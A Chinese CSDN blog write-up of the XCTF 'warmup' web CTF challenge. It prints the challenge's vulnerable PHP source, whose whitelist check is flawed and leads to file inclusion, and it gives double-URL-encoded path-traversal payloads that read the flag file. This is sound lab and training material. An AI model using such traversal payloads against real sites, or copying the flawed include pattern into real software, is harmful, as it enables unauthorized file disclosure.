XCTF—warmup

最新推荐文章于 2024-04-10 14:02:31 发布
最新推荐文章于 2024-04-10 14:02:31 发布
阅读量642 收藏 1
点赞数
分类专栏: CTF 文章标签: WEB php 文件包含
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41137110/article/details/109138613
版权

题目地址

题目名称:warmup

题目描述:暂无

题目附件:暂无

WriteUp:

创建场景访问后的页面如下:
在这里插入图片描述
啥也没有,只有一个大表情,查看源码,提示<!–source.php–>

在这里插入图片描述
source.php源码页面分析如下:

<?php
    highlight_file(__FILE__);#函数对文件进行语法高亮显示。
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {#必须传参$page,且参数是字符串,否则返回false
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {#如果参数在白名单里面 返回true
			
                return true;
            }

            $_page = mb_substr(#截取参数第一个?之前的字符串返回,
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);#对参数进行url解码
            $_page = mb_substr(#解码后截取第一个?之前的字符串返回
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {#如果在白名单里返回True
                return true;
            }
            echo "you can't see it";#返回false
            return false;
        }
    }
	#php类并不会执行(除非调用),从这开始执行
    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
	#判断为真的条件,file参数非空;file参数是字符串;checkFile返回结果为True
	#返回file参数的文件源码
        include $_REQUEST['file'];#把包含的文件读取进来
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

可以看到还有一个hint.php,查看内容如下:
在这里插入图片描述
根据猜测flag在得到了一个ffffllllaaaagggg文件中,source.php源码中有include语句。所以要把ffffllllaaaagggg文件的路径传入file参数中。

在本地使用wamp集成服务器组件搭建了一个php环境,一通测试分析之后如下:

  • 在地址栏需要file传参

  • file参数值经过checkFile函数返回值要为true

  • file参数值还要是ffffllllaaaagggg文件的路径

根据checkfile函数构造payload为:

?file=source.php%253f/../../../../ffffllllaaaagggg

因为%253f是’?'字符两次url编码后的值

因为url有一次自动url解码,第一次mb_substr时无变化,然后通过urldecode函数变成了?file=source.php?/…/…/…/…/ffffllllaaaagggg,然后截取?之前的参数正好是source.php结果返回true,而正好构造的payload是ffffllllaaaagggg的路径,…/的个数是逐次添加尝试得到的结果,如下:
在这里插入图片描述
原理:

include语句会包含url自动解码后的source.php%3f/…/…/…/…/ffffllllaaaagggg,而会从php根目录source.php%3f文件开始一个…/是一个上级目录,最后访问到ffffllllaaaagggg文件

另外:

下面这两个payload也可以访问,不知道为什么?

?file=source.php?../../../../../ffffllllaaaagggg

?file=source.php?/../../../../ffffllllaaaagggg

我再本地测试”source.php?/…/“这样写的的话是不能访问上级目录的,好像不会把source.php?当成一个文件名,?会当成传参符号,也不知道为什么可以访问到,也不纠结了😬

z2bns
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
[CTF题目总结-web篇]攻防世界-warmup
T2hunz1
01-10 7628
[CTF题目总结-web篇]攻防世界-warmup
攻防世界ctf题目warmup
kiwi的博客
11-19 1118
这道题目是确实简单的,但是困扰了我一天时间,然后才将其想明白。
【愚公系列】2023年06月 攻防世界-Web题目名称-warmup
时光隧道
06-17 4981
在执行反序列化函数unserialize()时,会自动执行魔法函数__wakeup()。PHP反序列化漏洞是一种安全漏洞,攻击者可以利用此漏洞实现远程代码执行。在PHP中,序列化是将对象转换为一系列字节,以便在网络上或在文件中进行传输。反序列化是将字节转换回对象。攻击者可以构造恶意序列化数据,当代码在反序列化时,恶意代码会被执行。解决PHP反序列化漏洞的建议:1.过滤输入:在将用户输入以任何形式提供给反序列化函数之前进行过滤和验证。例如,限制反序列化的类,或使用白名单过滤用户提供的对象。
xctfwarmup
qq_40646572的博客
10-21 638
仅一个登陆页面。 这是附件中的源码。 从上述源码可以看出,username与password被过滤了,并且没有办法进行绕过。username与password字段首先被addslashes()函数进行转义,‘、“、/都会被转义。然后在SQL类中query()函数调用waf()函数进行进一步的拦截。正常来讲,这两个字段不存在sql注入漏洞。 但关键点在于cookie,cookie处存在反序列化漏洞。首先可以构造sql类,此处有两种方法可以进行注入,进行登录绕过。 一、使用内连接进行绕过。此种方法是官方w
【愚公系列】2023年05月 攻防世界-Webwarmup
热门推荐
时光隧道
12-26 3万+
PHP源码审计是指对PHP编写的应用程序的代码进行仔细的分析和检验,以发现其中的漏洞和安全问题,并提出解决方案以确保应用程序的安全。这种审计可以帮助开发人员和企业识别潜在的安全风险,从而加强应用程序的安全性。通常,这种审计需要具备深厚的编程知识和安全专业知识,以便发现潜在的安全漏洞和风险。
XCTFwarmup[WriteUP],腾讯、美团网络安全面试经验分享
最新发布
2401_84185145的博客
04-10 313
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
[HCTF 2018]WarmUp 1 【文件包含漏洞】
weixin_38832257的博客
08-17 2252
题目简介 题目名称:[HCTF 2018]WarmUp 1 题目平台:BUUCTF 题目类型:Web 考察知识点: 代码审计 本地文件包含漏洞 解题步骤 启动并访问靶机,前端只有一个滑稽的表情 右击或F12审计一下代码,可以看到source.php,我们访问一下该页面 source.php内容如下。 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&amp
XCTFwarm up(代码审计分析)
sunleibaba的博客
01-20 656
XCTF warmup解题思路(详细讲解php代码部分): 废话不多说,进入正题: 点击创建好的环境之后,我们看到了这样一个画面: 网页是一张图片,有点懵,我们先按F12,看一下源代码: 嘿嘿,发现了一个source.php。进行查看发现一系列源代码: php源码解析: 为了便于讲解我们将代码放到notepad++上面: 第1行语句是php语言的固定开头。 第2行:对文件进行php语法高亮显示。 第3行:实例化一个叫emmm的类。 第4行和第11行语句是定义类的固定语法。 第5行:利用静态方法
攻防世界Webwarmup、NewsCenter、upload1”题解
qq_53325209的博客
04-25 3094
攻防世界Webwarmup、NewsCenter、upload1”题解。
buuctf web warmup详细题解
weixin_64160292的博客
03-31 3105
题目warmup 题目来源:buuctf 分析过程: 1. 首先ctrl + u 查看源代码,我们发现有一个source.php文件 2. 我们打开source.php文件,是一段代码,这道题要我们代码审计。 3. 与source文件相似的hint.php文件我们也打开看一下,它说flag在ffffllllaaaagggg中。 正在上传… 4. 然后回来source.php看这段代码,通过上网查询关于php的函数的用法。然后审计代码得出,...
XCTF-攻防世界CTF平台-Web类——6、warmupphp中include函数遍历漏洞)
Onlyone_1314的博客
11-15 1525
打开题目地址: 标题栏是Document,只有一张图片,所以我们审计源代码: 有一个source.php打开: 有一段判断页面的代码,还有一个hint.php 提示flag在ffffllllaaaagggg中,应该是另一个文件中,直接访问ffffllllaaaagggg文件是不存在的: 所以我们继续看source.php中的代码: <?php highlight_file(__FILE__); class emmm { public static fu
2021年“绿城杯”网络安全大赛-Crypto-[warmup]加密算法
qq_43264813的博客
09-30 301
2021年“绿城杯”网络安全大赛-Crypto-[warmup]加密算法 题目名称:[warmup]加密算法 题目内容:一道简单的加密算法分析 题目分值:50.0 题目难度:容易 相关附件:[warmup]加密算法的附件.zip 解题思路: 1.跟着原题脚本 爆破一波就有了脚本为 str1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ' cipher_text = 'aoxL{XaaHKP_tHgwpc_hN_ToXnnht}' a=37 b
XCTF warmup
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-10 1118
这题没有二进制文件 最简单的一个盲打pwn题 。虽然难的题目我还不会 只有一个ip和一个端口 nc连接上去看看 发现程序会给我们返回一个地址 猜测这个地址就是后门函数的地址 写了个爆破程序 from pwn import * def blast(ip,port,padd_start,padd_end,addr): for i in range(padd_start,padd_end): ...
攻防世界XCTFwarmup
末初的CSDN博客
03-14 1891
F12发现注释:<!--source.php--> <?php class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"...
warmup(xctf)
weixin_43868725的博客
05-26 327
0x0 exp 没有附件。就是要blind pwn。nc连接了几次都给了同一个返回地址。 所以就写个循环一直试。 from pwn import * addr=0x40060D def send(sh,form,num): payload='a'*num if form == 1: payload+=p64(addr) if form == 2: payload+=p32(addr) sh.sendlineafter('&g
文件包含-xctf-warmup
qq_43660551的博客
07-10 782
启动环境,发现只有一个滑稽。也没什么别的信息。f12看下。发现有个source.php。访问下看看。发现一堆代码。审计代码。 ,然后再判断一次 绕过思路:以file作为请求的参数(利用file协议),构造payload,满足:(1)file不为空且在白名单中,或者file参数中的?之前的子字符串在白名单中,也就是说为source.php或者hint.php。(2)知道ffffllllaaaagggg的路径,或者用“../”进行目录穿越。
2021年“绿城杯”网络安全大赛-Reverse-[warmup]easy_re
qq_43264813的博客
09-30 1045
2021年“绿城杯”网络安全大赛-Reverse-[warmup]easy_re 题目名称:[warmup]easy_re 题目内容:热身题,逆向 题目分值:100.0 题目难度:容易 相关附件:[warmup]easy_re的附件.zip 解题思路: main函数看到最后发现关键比较 分析得知v21是输入,v16是大数数组 这里ida将v16后面的值分成了别的变量,实际上也在v16之中 前两个循环用python模拟得到了v24的值 v16=[ 0xF5, 0x8C, 0x8D, 0xE4, 0x9F, 0
攻防世界-Web进阶区-warmup题解
Jollowin的博客
11-26 802
warmup题解 我们进入到题目界面会看到一张猥琐的笑脸,假装没看到他直接按F12。 这里我们发现了一条线索:source.php。 好家伙,那我们不妨到source.php看一看: 进行代码审计,初步发现我们可以提交一个名为file的变量,若变量file的值为source.php或hint.php则会执行include $_REQUEST[‘file’]。 那我们不妨令file=hint.php看一看。 1.如上图我们发现底部出现了一行提示,那我们现在的目的就变成了让 include $_REQUE
team [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列28(网站配置错误,需自行配置本地环境测试)
重新启程
01-04 1704
请注意:本题在攻防世界网站配置错误,请自行配置本地环境测试 最近攻防世界的题目pwn高手进阶区全部打乱了,所以现在我的题目列表是下面这样的了,搞的我的尴尬症都犯了???? 准备看看能不能把一些题目解决一下,不过其中有些题目的环境是配置错误的,我已经联系网站的工作人员,准备进QQ群。 现在我就先把team这道题目给大家说明一下。这道题目其实并不是太复杂,但是网站的工作人员没有搞清楚这道题目的出题方法...
warmup [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列14
重新启程
12-23 1823
题目地址:warmup 这是高手进阶区的第三题,我们先看下题目内容 这个题目没有附件,那就是要fuzz的题目了,我们先正常走一下程序看看 root@mypwn:/ctf/work/python/warmup# nc 111.198.29.45 32453 -Warm Up- WOW:0x40060d >AAA 这个题目的出发点就是要大家做fuzz,看下提示内容有个地址0x40060...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z2bns

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值